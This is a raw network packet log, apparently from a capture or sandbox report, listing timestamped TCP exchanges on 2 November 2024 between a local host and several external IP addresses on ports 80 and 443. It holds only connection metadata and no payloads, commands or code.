Nov 2, 2024 17:57:00.126007080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126048088 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126142025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126153946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126166105 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126179934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126193047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126199007 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126204014 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126216888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126229048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126236916 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126236916 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126241922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126254082 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126287937 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126524925 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126535892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126574039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126679897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126691103 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126703024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126714945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126728058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126739025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126739025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126749992 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126754999 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126765013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126777887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126777887 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126791000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126796007 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126805067 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.126821995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.126849890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127196074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127240896 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127265930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127279043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127301931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127319098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127326012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127327919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127338886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127340078 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127366066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127372980 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127561092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127573013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127584934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127597094 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127609015 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127610922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127623081 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.127635956 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127652884 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.127677917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.223676920 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.223987103 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.224009037 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.224349022 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.224898100 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.224982023 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.225070000 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.226594925 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.227148056 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.227183104 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.227601051 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.227607012 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.243983984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244035959 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244076967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244082928 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244119883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244151115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244163990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244179010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244203091 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244226933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244362116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244374990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244390011 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244400024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244405031 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244415998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244447947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244641066 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244659901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244673967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244685888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244690895 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244715929 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244744062 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244750023 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244760990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244766951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244841099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.244954109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244966030 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244978905 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.244998932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245009899 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245012045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245023966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245038033 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245049953 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245053053 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245068073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245515108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245527983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245539904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245548010 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245558977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245567083 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245572090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245583057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245596886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245598078 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245609045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245628119 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245661974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245661974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245661974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.245960951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245974064 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245985985 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.245997906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246011019 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246031046 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246057034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246237040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246248960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246262074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246275902 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246287107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246296883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246326923 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246376038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246390104 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246401072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246413946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246427059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246433020 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246439934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246453047 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246453047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246465921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246475935 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246479034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246490002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246500969 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246503115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.246531963 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.246546984 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.247158051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.247169018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.247180939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.247191906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.247203112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.247204065 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.247211933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.247245073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.271334887 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.332437992 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.332901001 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.332930088 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.333415985 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.333420992 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.360660076 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.360690117 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.360763073 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.360769987 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.360913038 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.360917091 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.361185074 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.361243963 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.361917973 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.361938953 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.361952066 CET	50010	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.361958981 CET	443	50010	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.364274979 CET	50012	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.364310980 CET	443	50012	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.364392042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364417076 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364428997 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364485025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364506006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364509106 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364518881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364531040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364545107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364551067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364589930 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364749908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364762068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364773035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364779949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364798069 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364835024 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364908934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364923000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364934921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.364954948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.364979982 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365041018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365159988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365171909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365183115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365195036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365207911 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365215063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365227938 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365227938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365242004 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365253925 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365257025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365267992 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365283966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365300894 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365335941 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365633011 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365645885 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365658045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365669966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365684986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365689039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365699053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365719080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365746975 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.365935087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365947008 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365958929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365972042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365983963 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365994930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.365997076 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366019964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366029024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366038084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366074085 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366097927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366112947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366125107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366137028 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366151094 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366163015 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366167068 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366174936 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366184950 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366188049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366199017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366204977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366205931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366219044 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366230965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366231918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366266012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366277933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366923094 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366935968 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366947889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366961956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366974115 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.366975069 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.366990089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.367013931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.367032051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.371139050 CET	50018	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.371180058 CET	443	50018	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.371243000 CET	50018	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.371428013 CET	50018	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:57:00.371442080 CET	443	50018	23.55.178.204	192.168.2.7
Nov 2, 2024 17:57:00.372133017 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.372165918 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.372246981 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.372432947 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.372445107 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.381177902 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.381797075 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.381850958 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.382391930 CET	50014	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.382399082 CET	443	50014	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.410502911 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.410556078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.410567999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.410595894 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.410617113 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.428710938 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.429224968 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.429250956 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.429706097 CET	50015	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.429712057 CET	443	50015	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.464127064 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.464201927 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.464251041 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.464499950 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.464517117 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.464529037 CET	50013	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.464534998 CET	443	50013	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.468209982 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.468264103 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.468380928 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.470657110 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:00.470676899 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:00.483284950 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483344078 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483345985 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483357906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483385086 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483391047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483409882 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483444929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483453035 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483490944 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483558893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483571053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483624935 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483649015 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483659029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483692884 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483701944 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483710051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483818054 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483830929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483850956 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483864069 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.483932972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483946085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.483982086 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484081030 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484092951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484107018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484121084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484138012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:00.484342098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484354973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484366894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484380960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:00.484391928 CET	49933	80	192.168.2.7	62.204.41.163
